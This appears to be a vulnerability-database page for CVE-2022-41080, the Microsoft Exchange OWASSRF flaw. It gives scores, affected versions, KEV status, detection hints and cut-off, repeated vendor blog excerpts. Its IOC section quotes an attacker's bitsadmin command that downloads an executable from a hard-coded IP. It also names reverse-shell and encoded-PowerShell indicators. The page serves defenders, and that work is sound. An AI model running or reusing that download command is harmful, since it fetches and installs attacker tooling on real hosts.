CVE-2022-41080
published 2022-11-09CVE-2022-41080: Microsoft Exchange Server Elevation of Privilege Vulnerability
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2023-01-31
Exploited in the wild
EPSS
77.33%
99.5th percentile
Microsoft Exchange Server Elevation of Privilege Vulnerability
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | exchange_server | — | — |
| microsoft | exchange_server | — | — |
| microsoft | exchange_server | — | — |
| microsoft | microsoft_exchange_server_2013_cumulative_update_23 | >= 15.00.0 < 15.00.1497.044 | 15.00.1497.044 |
| microsoft | microsoft_exchange_server_2016_cumulative_update_22 | >= 15.0.0 < 15.01.2375.037 | 15.01.2375.037 |
| microsoft | microsoft_exchange_server_2016_cumulative_update_23 | >= 15.01.0 < 15.01.2507.016 | 15.01.2507.016 |
| microsoft | microsoft_exchange_server_2019_cumulative_update_11 | >= 15.02.0 < 15.02.0986.036 | 15.02.0986.036 |
| microsoft | microsoft_exchange_server_2019_cumulative_update_12 | >= 15.02.0 < 15.02.1118.020 | 15.02.1118.020 |
| msrc | microsoft_exchange_server_2013_cumulative_update_23 | — | — |
| msrc | microsoft_exchange_server_2016_cumulative_update_22 | — | — |
| msrc | microsoft_exchange_server_2016_cumulative_update_23 | — | — |
| msrc | microsoft_exchange_server_2019_cumulative_update_11 | — | — |
| msrc | microsoft_exchange_server_2019_cumulative_update_12 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandbitsadmin /transfer JobName /download /priority FOREGROUND http://179.60.149.28:4427/22.exe C:\1.exe↗
- →Detect PowerShell spawned as a child process of the IIS web server process (w3wp.exe) — a Sigma rule for this is available in the Huntress Threat Intel GitHub repository ↗
- →Detect use of raw TCP sockets in PowerShell command lines as an indicator of the SilverArrow reverse shell payload used in post-exploitation ↗
- →Check for base64-encoded PowerShell command lines running as child processes of w3wp.exe as a secondary indicator of OWASSRF exploitation ↗
- →The OWASSRF exploit uses the pypsrp Python package to communicate via PowerShell Remoting protocol through the OWA authenticated HTTP session — look for WSMan traffic proxied through OWA ↗
- →Attackers used bitsadmin.exe (native Windows utility) to download post-exploitation tooling from attacker-controlled infrastructure — monitor for bitsadmin child processes of w3wp.exe ↗
- ·The OWASSRF exploit bypasses the URL rewrite mitigations Microsoft provided for ProxyNotShell in September 2022 — those mitigations are NOT effective against CVE-2022-41080-based exploitation ↗
- ·The exploit only requires valid but unprivileged Exchange/OWA credentials — no administrative account is needed for initial access ↗
- ·Exchange Online (cloud) customers are not affected; only on-premises Exchange Server 2013, 2016, and 2019 installations prior to KB5019758 are vulnerable ↗
- ·Successful exploitation results in code execution as NT AUTHORITY\SYSTEM, not just the authenticated user's privilege level ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.8HIGH
cisa9.8CRITICAL
vendor_msrc8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w3h9-qg85-w3f5: Microsoft Exchange Server Elevation of Privilege Vulnerability
ghsa_unreviewed·2022-11-10·CVSS 8.8
CVE-2022-41123 [HIGH] GHSA-w3h9-qg85-w3f5: Microsoft Exchange Server Elevation of Privilege Vulnerability
Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-41080.
GHSA
GHSA-2cwh-g5wf-mfh8: Microsoft Exchange Server Elevation of Privilege Vulnerability
ghsa_unreviewed·2022-11-10·CVSS 7.8
CVE-2022-41080 [HIGH] GHSA-2cwh-g5wf-mfh8: Microsoft Exchange Server Elevation of Privilege Vulnerability
Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-41123.
VulnCheck
Microsoft Exchange Server Privilege Escalation Vulnerability
vulncheck·2022·CVSS 8.8
CVE-2022-41080 [HIGH] Microsoft Exchange Server Privilege Escalation Vulnerability
Microsoft Exchange Server Privilege Escalation Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is chainable with CVE-2022-41082, which allows for remote code execution.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.bleepingcomputer.com/news/security/microsoft-cuba-ransomware-hacking-exchange-servers-via-owassrf-flaw/; https://info.securin.io/hubfs/Securin%20Ransomware%20Report%202023.pdf; https://www.dragos.com/blog/ran
CISA
Microsoft Exchange Server Privilege Escalation Vulnerability
cisa·2023-01-10·CVSS 9.8
CVE-2022-41080 [CRITICAL] Microsoft Exchange Server Privilege Escalation Vulnerability
Vulnerability: Microsoft Exchange Server Privilege Escalation Vulnerability
Affected: Microsoft Exchange Server
Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is chainable with CVE-2022-41082, which allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080; https://nvd.nist.gov/vuln/detail/CVE-2022-41080
Remediation Due Date: 2023-01-31
Microsoft
Microsoft Exchange Server Elevation of Privilege Vulnerability
vendor_msrc·2022-11-08·CVSS 8.8
CVE-2022-41080 [HIGH] Microsoft Exchange Server Elevation of Privilege Vulnerability
Microsoft Exchange Server Elevation of Privilege Vulnerability
Microsoft Exchange Server: Microsoft Exchange Server
Microsoft: Microsoft
Customer Action Required: Yes
Impact: Elevation of Privilege
Exploit Status: Publicly Disclosed:No;Exploited:No;Latest Software Release:Exploitation More Likely;DOS:N/A
Reference: https://www.microsoft.com/download/details.aspx?familyid=4342d7ed-0583-4d2c-831c-836ee8f7bf62
Reference: https://www.microsoft.com/download/details.aspx?familyid=bbba5ecc-0ab5-466c-98bb-766c46a78fc2
Reference: https://www.microsoft.com/download/details.aspx?familyid=124eeb2b-4066-459e-9416-ee98683f4997
Reference: https://www.microsoft.com/download/details.aspx?familyid=09804a62-d5b7-4e38-9902-010326747aef
Reference: https://www.microsoft.com/download/details.aspx?famil
No detection rules found.
No public exploits indexed.
Qualys
Safeguard Your Organization this Holiday Season with Endpoint Security from Qualys
blogs_qualys·2023-10-26·CVSS 8.8
[HIGH] Safeguard Your Organization this Holiday Season with Endpoint Security from Qualys
## Table of Contents
Understanding the Holiday Cyber Threat Landscape
Why are cyber threats active during the holiday season?
The Morale Factor of Holiday Cyber Threats
Best Practices for Protecting Your Organization Over the Holidays
Qualys Customers Offer: Gain Peace of Mind with Qualys Endpoint Security
The holiday season is approaching, bringing joy, family gatherings, and celebrations. As we dust off the decorations and begin drafting shopping lists, security professionals must grapple with an underlying concern: the increased risk of cyberattacks.
Year-end festivities bring a rise in online activities – shopping, holiday greetings, and more. Unfortunately, this bustling digital activity attracts cybercriminals ready to exploit the season’s goodwill, creating an enormous risk o
Qualys
Safeguard Your Organization this Holiday Season with Endpoint Security from Qualys | Qualys
blogs_qualys·2023-10-26·CVSS 8.8
[HIGH] Safeguard Your Organization this Holiday Season with Endpoint Security from Qualys | Qualys
#### Table of Contents
- Understanding the Holiday Cyber Threat Landscape
- Why are cyber threats active during the holiday season?
- The Morale Factor of Holiday Cyber Threats
- Best Practices for Protecting Your Organization Over the Holidays
- Qualys Customers Offer: Gain Peace of Mind with Qualys Endpoint Security
The holiday season is approaching, bringing joy, family gatherings, and celebrations. As we dust off the decorations and begin drafting shopping lists, security professionals must grapple with an underlying concern: the increased risk of cyberattacks.
Year-end festivities bring a rise in online activities – shopping, holiday greetings, and more. Unfortunately, this bustling digital activity attracts cybercriminals ready to exploit the season’s goodwill, creating an enormou
Dragos
Dragos Industrial Ransomware Attack Analysis: Q1 2023
blogs_dragos·2023-04-20
Dragos Industrial Ransomware Attack Analysis: Q1 2023
OT Cybersecurity Basics Build a stronger OT security strategy
5 Critical Controls SANS ICS framework for defense
Industrial Risk Management Quantifying OT risk and dependencies
Monitoring Threat Groups Know your adversary
Year in Review Report 9th annual threat report
OT Compliance NIS2, CAF v4, SOCI/SONS, TSA, & more
NERC CIP Dragos Alignment
INSM Compliance Path for NERC-CIP-015
RESOURCES
Threat Reports
Whitepapers
Datasheets
Solution Briefs
Case Studies
Blog
Webinars
Dragos Industrial Security Conference
COMMUNITY
OT-CERT Program
Community Defense Program
DRAGOS ACADEMY
On-Demand Training
About Dragos Safeguarding civilization
Leadership Experts in defense
Newsroom Up-to-date cyber news
Careers Current job openings
Event Calendar Connect in person
Dragos Indus
Tenable
Microsoft’s February 2023 Patch Tuesday Addresses 75 CVEs (CVE-2023-23376)
blogs_tenable·2023-02-14·CVSS 7.8
[HIGH] Microsoft’s February 2023 Patch Tuesday Addresses 75 CVEs (CVE-2023-23376)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
ProxyNotShell, OWASSRF, TabShell: Patch Your Microsoft Exchange Servers Now
blogs_tenable·2023-01-31
ProxyNotShell, OWASSRF, TabShell: Patch Your Microsoft Exchange Servers Now
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
9th January – Threat Intelligence Report
blogs_checkpoint·2023-01-09·CVSS 9.8
CVE-2022-41080 [CRITICAL] 9th January – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 9th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 9th January, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHES
Check Point Research has published a report on APT-C-36, also known as Blind Eagle – a financially motivated threat group attacking citizens of various countries in South America since at least 2018. CPR has spotted a new campaign by this APT group targeting organizations and government entities in Ecuador with a new and adva
Huntress
OWASSRF Explained: Analyzing the Microsoft Exchange RCE Vulnerability | Huntress
blogs_huntress·2022-12-29·CVSS 9.8
CVE-2022-41080 [CRITICAL] OWASSRF Explained: Analyzing the Microsoft Exchange RCE Vulnerability | Huntress
We simply couldn’t end the year 2022 on a calm note—hackers made sure of that with their latest Microsoft Exchange exploit.
On December 22, Huntress observed a significant increase in malicious PowerShell executions delivering a ConnectWise Control (ScreenConnect) payload on unpatched Exchange hosts using the exploit chain consisting of CVE-2022-41080 and CVE-2022-41082 . This exploit chain was coined “OWASSRF” by Crowdstrike , as it involves an Outlook Web Access server-side request forgery. The exploit chain relates to ProxyNotShell, but it bypasses the mitigation guidance Microsoft provided in September prior to releasing their patch.
Keep reading for our analysis of how the OWASSRF exploit works, how it achieves remote code execution and what you should know to stay protected.
## Ho
Checkpoint
26th December – Threat Intelligence Report
blogs_checkpoint·2022-12-26
CVE-2022-41080 26th December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 26th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 26th December, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHES
LastPass revealed that it has been breached for the second time this year, an event that resulted in attackers stealing customer encrypted password vaults and additional account information. The breach was achieved after attackers used information stolen from the LastPass development environment in the August incident to
Unit42
Threat Brief: OWASSRF Vulnerability Exploitation
blogs_unit42·2022-12-23·CVSS 8.8
CVE-2022-41080 [HIGH] Threat Brief: OWASSRF Vulnerability Exploitation
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: OWASSRF Vulnerability Exploitation
Robert Falcone
Lior Rochberger
Published: December 22, 2022
High Profile Threats
Vulnerabilities
Backdoor
CVE-2022-41080
CVE-2022-41082
Microsoft Exchange Server
OWASSRF
ProxyNotShell
SilverArrow
## Executive Summary
On Dec. 20, 2022, CrowdStrike published a blog discussing a new exploit method for Microsoft Exchange Server, which they named OWASSRF, referring to server-side request forgery in relation to Outlook on the web. (Outlook on the web is known as both Outlook Web Access and Outlook Web Application.)
The OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) v
Unit42
Threat Brief: OWASSRF Vulnerability Exploitation
blogs_unit42·2022-12-23·CVSS 8.8
CVE-2022-41080 [HIGH] Threat Brief: OWASSRF Vulnerability Exploitation
## Executive Summary
On Dec. 20, 2022, CrowdStrike published a blog discussing a new exploit method for Microsoft Exchange Server, which they named OWASSRF, referring to server-side request forgery in relation to Outlook on the web. (Outlook on the web is known as both Outlook Web Access and Outlook Web Application.)
The OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) via Outlook Web Access (OWA). The CVE-2022-41082 vulnerability was previously used by the ProxyNotShell exploit. However, the OWASSRF exploit method bypasses mitigations previously provided by Microsoft for ProxyNotShell. OWASSRF requires authentication to the Exchange Server prior to exploitation, thus we are seeing isolated r
Wiz
OWASSRF, a new exploit for Exchange vulnerabilities | Wiz Blog
blogs_wiz·2022-12-22·CVSS 8.8
CVE-2022-41080 [HIGH] OWASSRF, a new exploit for Exchange vulnerabilities | Wiz Blog
A new exploit method, referred to as OWASSRF, has been discovered by researchers and exploited in the wild. This exploit combines CVE-2022-41080 and CVE-2022-41082 to enable remote code execution (RCE) through Outlook Web Access (OWA). The OWASSRF exploit successfully bypasses URL rewrite mitigations previously provided by Microsoft for ProxyNotShell.
## What is OWASSRF?
On September 29, 2022, reports emerged of active exploitation of two zero-day vulnerabilities in Microsoft Exchange, which could allow remote code execution (RCE). These vulnerabilities were identified by Microsoft as CVE-2022-41040, a server-side request forgery (SSRF) vulnerability, and CVE-2022-41082, which allows RCE. These vulnerabilities were collectively referred to as ProxyNotShell.
On December 20th, researchers
Wiz
OWASSRF, a new exploit for Exchange vulnerabilities | Wiz Blog
blogs_wiz·2022-12-22·CVSS 8.8
CVE-2022-41080 [HIGH] OWASSRF, a new exploit for Exchange vulnerabilities | Wiz Blog
A new exploit method, referred to as OWASSRF, has been discovered by researchers and exploited in the wild. This exploit combines CVE-2022-41080 and CVE-2022-41082 to enable remote code execution (RCE) through Outlook Web Access (OWA). The OWASSRF exploit successfully bypasses URL rewrite mitigations previously provided by Microsoft for ProxyNotShell.
# What is OWASSRF?
On September 29, 2022, reports emerged of active exploitation of two zero-day vulnerabilities in Microsoft Exchange, which could allow remote code execution (RCE). These vulnerabilities were identified by Microsoft as CVE-2022-41040, a server-side request forgery (SSRF) vulnerability, and CVE-2022-41082, which allows RCE. These vulnerabilities were collectively referred to as ProxyNotShell.
On December 20th, researchers
Krebs
Patch Tuesday, November 2022 Election Edition
blogs_krebs·2022-11-09·CVSS 7.8
[HIGH] Patch Tuesday, November 2022 Election Edition
Let’s face it: Having “2022 election” in the headline above is probably the only reason anyone might read this story today. Still, while most of us here in the United States are anxiously awaiting the results of how well we’ve patched our Democracy, it seems fitting that Microsoft Corp. today released gobs of security patches for its ubiquitous Windows operating systems. November’s patch batch includes fixes for a whopping six zero-day security vulnerabilities that miscreants and malware are already exploiting in the wild.
Probably the scariest of the zero-day flaws is CVE-2022-41128 , a “critical” weakness in the Windows scripting languages that could be used to foist malicious software on vulnerable users who do nothing more than browse to a hacked or malicious site that exploits the we
Krebs
Patch Tuesday, November 2022 Election Edition
blogs_krebs·2022-11-09·CVSS 7.8
[HIGH] Patch Tuesday, November 2022 Election Edition
Let’s face it: Having “2022 election” in the headline above is probably the only reason anyone might read this story today. Still, while most of us here in the United States are anxiously awaiting the results of how well we’ve patched our Democracy, it seems fitting that Microsoft Corp. today released gobs of security patches for its ubiquitous Windows operating systems. November’s patch batch includes fixes for a whopping six zero-day security vulnerabilities that miscreants and malware are already exploiting in the wild.
Probably the scariest of the zero-day flaws is CVE-2022-41128, a “critical” weakness in the Windows scripting languages that could be used to foist malicious software on vulnerable users who do nothing more than browse to a hacked or malicious site that exploits the wea
Qualys
November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years).
blogs_qualys·2022-11-08·CVSS 7.5
[HIGH] November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years).
## Table of Contents
Microsoft Patch Tuesday Summary
The November 2022 Microsoft Vulnerabilities are Classified as Follows:
OpenSSL 3.x Critical Vulnerability Highlights
OpenSSL 3.x Related Blogs and Resources
Microsoft Addressed Six Zero-Day Vulnerabilities
Microsoft Patch Tuesday Critical Vulnerability Highlights
Microsoft Release Summary
Adobe Security Bulletins and Advisories
About Qualys Patch Tuesday
Qualys Threat Research Blog Posts
Qualys Threat Protection High-Rated Advisories
Discover and Prioritize Vulnerabilities in Vulnerability Management Detection Response(VMDR)
Rapid Response with Patch Management (PM)
Extend the Power of VMDR to Enterprise Mobile Devices With Qualys VMDR Mobile
Execute Mitigation UsingCustom Assessment and Remediation(CAR)
Patch Tuesday Is
Talos
Microsoft Patch Tuesday for November 2022 — Snort rules and prominent vulnerabilities
blogs_talos·2022-11-08·CVSS 8.1
CVE-2022-41039 [HIGH] Microsoft Patch Tuesday for November 2022 — Snort rules and prominent vulnerabilities
## Microsoft Patch Tuesday for November 2022 — Snort rules and prominent vulnerabilities
Microsoft released its monthly security update on Tuesday, disclosing 62 vulnerabilities. Of these vulnerabilities, 8 are classified as “Critical” and the rest are classified as “Important.”
Three of the critical entries are remote code execution (RCE) vulnerabilities for Windows Point-to-Point Tunneling Protocol (PPTP).
CVE-2022-41039
CVE-2022-41044
CVE-2022-41088
An unauthenticated attacker can send a specially crafted request to an RAS (Remote Access Server), which may lead to remote code execution. Although according to Microsoft, these three vulnerabilities are less likely to be exploited, as the attacker must win a complex race condition. In August of 2022’s Patch Tuesday release, several v
Qualys
November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years). | Qualys
blogs_qualys·2022-11-08·CVSS 7.5
[HIGH] November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years). | Qualys
#### Table of Contents
- Microsoft Patch Tuesday Summary
- The November 2022 Microsoft Vulnerabilities are Classified as Follows:
- OpenSSL 3.x Critical Vulnerability Highlights
- OpenSSL 3.x Related Blogs and Resources
- Microsoft Addressed Six Zero-Day Vulnerabilities
- Microsoft Patch Tuesday Critical Vulnerability Highlights
- Microsoft Release Summary
- Adobe Security Bulletins and Advisories
- About Qualys Patch Tuesday
- Qualys Threat Research Blog Posts
- Qualys Threat Protection High-Rated Advisories
- Discover and Prioritize Vulnerabilities in Vulnerability Management Detection Response(VMDR)
- Rapid Response with Patch Management (PM)
- Extend the Power of VMDR to Enterprise Mobile Devices With Qualys VMDR Mobile
- Execute Mitigation UsingCustom Assessment and Remediation(CAR)
Talos
Microsoft Patch Tuesday for November 2022 — Snort rules and prominent vulnerabilities
blogs_talos·2022-11-08·CVSS 8.1
CVE-2022-41039 [HIGH] Microsoft Patch Tuesday for November 2022 — Snort rules and prominent vulnerabilities
Microsoft released its monthly security update on Tuesday, disclosing 62 vulnerabilities. Of these vulnerabilities, 8 are classified as “Critical” and the rest are classified as “Important.”
Three of the critical entries are remote code execution (RCE) vulnerabilities for Windows Point-to-Point Tunneling Protocol (PPTP).
- CVE-2022-41039
- CVE-2022-41044
- CVE-2022-41088
An unauthenticated attacker can send a specially crafted request to an RAS (Remote Access Server), which may lead to remote code execution. Although according to Microsoft, these three vulnerabilities are less likely to be exploited, as the attacker must win a complex race condition. In August of 2022’s Patch Tuesday release, several vulnerabilities for Windows PPTP were also disclosed.
Another notable vulnerability in
Crowdstrike
Patch Tuesday Turns 20: The Impact of Microsoft’s Vulnerability Problem
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Patch Tuesday Turns 20: The Impact of Microsoft’s Vulnerability Problem
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Crowdstrike
Patch Tuesday Turns 20: The Impact of Microsoft’s Vulnerability Problem
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Patch Tuesday Turns 20: The Impact of Microsoft’s Vulnerability Problem
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand AT
Huntress
OWASSRF Explained: Analyzing the Microsoft Exchange RCE Vulnerability | Huntress
blogs_huntress·CVSS 9.8
CVE-2022-41080 [CRITICAL] OWASSRF Explained: Analyzing the Microsoft Exchange RCE Vulnerability | Huntress
We simply couldn’t end the year 2022 on a calm note—hackers made sure of that with their latest Microsoft Exchange exploit.
On December 22, Huntress observed a significant increase in malicious PowerShell executions delivering a ConnectWise Control (ScreenConnect) payload on unpatched Exchange hosts using the exploit chain consisting of CVE-2022-41080 and CVE-2022-41082. This exploit chain was coined “OWASSRF” by Crowdstrike, as it involves an Outlook Web Access server-side request forgery. The exploit chain relates to ProxyNotShell, but it bypasses the mitigation guidance Microsoft provided in September prior to releasing their patch.
Keep reading for our analysis of how the OWASSRF exploit works, how it achieves remote code execution and what you should know to stay protected.
## How
Crowdstrike
NEWSROOM
blogs_crowdstrike
NEWSROOM
Upcoming events
Conference
CrowdTour
Find a city near you
Summit
Day Zero 2026
Las Vegas, NV
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Blog
Contact us
Careers
Latest Innovations
## FEATURED NEWS
CNBC
Some LLMs can find vulnerabilities in code, but that isn’t stopping breaches, says CrowdStrike CEO George Kurtz
CNBC
Some LLMs can find vulnerabilities in code, but that isn’t stopping breaches, says CrowdStrike CEO George Kurtz
CNBC
CRN
CrowdStrike AgentWorks Expansion Gives ‘Big’ Boost To Security For Partners: CEO George Kurtz
CRN
Forbes
CrowdStrike At GTC Makes The Case For AI Native Security
Forbes
CNBC
Mad Money: CrowdStrike was able to change AI narrative all b
Crowdstrike
November 2022 Patch Tuesday: Updates and Analysis
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] November 2022 Patch Tuesday: Updates and Analysis
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Crowdstrike
News Archive
blogs_crowdstrike
News Archive
Upcoming events
Conference
CrowdTour
Find a city near you
Summit
Day Zero 2026
Las Vegas, NV
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Blog
Contact us
Careers
Latest Innovations
## News
26-Mar-2026 | CRN
CrowdStrike AgentWorks Expansion Gives ‘Big’ Boost To Security For Partners: CEO George Kurtz
Read
26-Mar-2026 | CNBC
Some LLMs can find vulnerabilities in code, but that isn’t stopping breaches, says CrowdStrike CEO George Kurtz
Read
23-Mar-2026 | MSSP Alert
CrowdStrike Brings AI Security to the Endpoint – and the Timing Makes Sense
Read
23-Mar-2026 | Security Boulevard
CrowdStrike Redefines Cybersecurity Architecture for Autonomous AI
Read
23-Mar-2026 | SiliconA
2022-11-09
Published
2023-01-10
Added to CISA KEV
Exploited in the wild